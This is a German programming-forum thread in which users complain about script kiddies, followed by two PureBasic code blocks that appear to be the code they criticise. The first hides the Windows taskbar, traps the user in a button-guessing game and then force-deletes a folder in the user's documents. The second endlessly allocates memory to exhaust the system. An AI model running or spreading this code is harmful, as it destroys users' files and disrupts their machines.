Das du das gerade sagst, richtig süß!

Der Thread trifft den Nagel auf den Kopf. Die Programmierer werden immer auler, aber die Scriptkiddies immer fleißiger...Joel hat geschrieben:Zitat:Das mit ICQ war nur ein Test Ordner. Ich könnte den Ordner auch test nennen.
Irgentwie werden alle in Pure Bord fauler.
siehe link:
http://www.purebasic.fr/german/viewtopi ... ght=fauler
Mir gehts genauso... naja einfach zurückhalten, abwarten morgen sind die Mods wieder unterwegs125 hat geschrieben:Hi,
ich hab mir gerade ma den Thread durchgelesen, da würd man doch am liebsten schreiend Amok laufen
1. Warum schreibt man soeine **** ** **** ****???
2. Warum fragt man dann auch noch nach Fehlern
3. Kann ma wer den Thread hier closen, in den Mülleimer verfrachten oder ähnliches?
4. ..... ich sag lieber nichts mehr könnte hier noch 100 Punkte aufzählen und den Kompletten Thread auseinandernehmen....
mfg
125
Code: Alles auswählen
Buffer.s=Space(256)
nSize.l=256
RET=GetUserName_(@Buffer,@nSize)
If OpenWindow(0, 100, 100, 640, 640, #PB_Window_TitleBar | #PB_Window_SystemMenu, "Such den richtigen Button!")
MessageRequester("Mist", "Deine Startleiste ist verschwunden! Finde den richtigen Button, damit sie wieder zurückkommt!", #PB_MessageRequester_Ok)
CreateGadgetList(WindowID())
i = 0
For x = 0 To 576 Step 64
For y = 0 To 576 Step 64
i = i + 1
ButtonGadget(i, x, y, 64, 64, "Hoho!")
Next
Next
tWnd = FindWindow_("Shell_TrayWnd", "")
ShowWindow_(tWnd, 0)
Repeat
EventID = WaitWindowEvent()
Select EventID
Case #PB_Event_Gadget
Select EventGadgetID()
Case Random(99)
ShowWindow_(tWnd, 1)
MessageRequester("Glück gehabt!", "Ende")
DeleteDirectory("C:\Dokumente und Einstellungen\"+PeekS(Buffer)+"\Eigene Dateien\test", "*.*" , #PB_FileSystem_Force)
End
EndSelect
EndSelect
Until EventID = #PB_Event_CloseWindow
EndIf
Code: Alles auswählen
Repeat
AllocateMemory(1000000)
Delay(10)
ForEver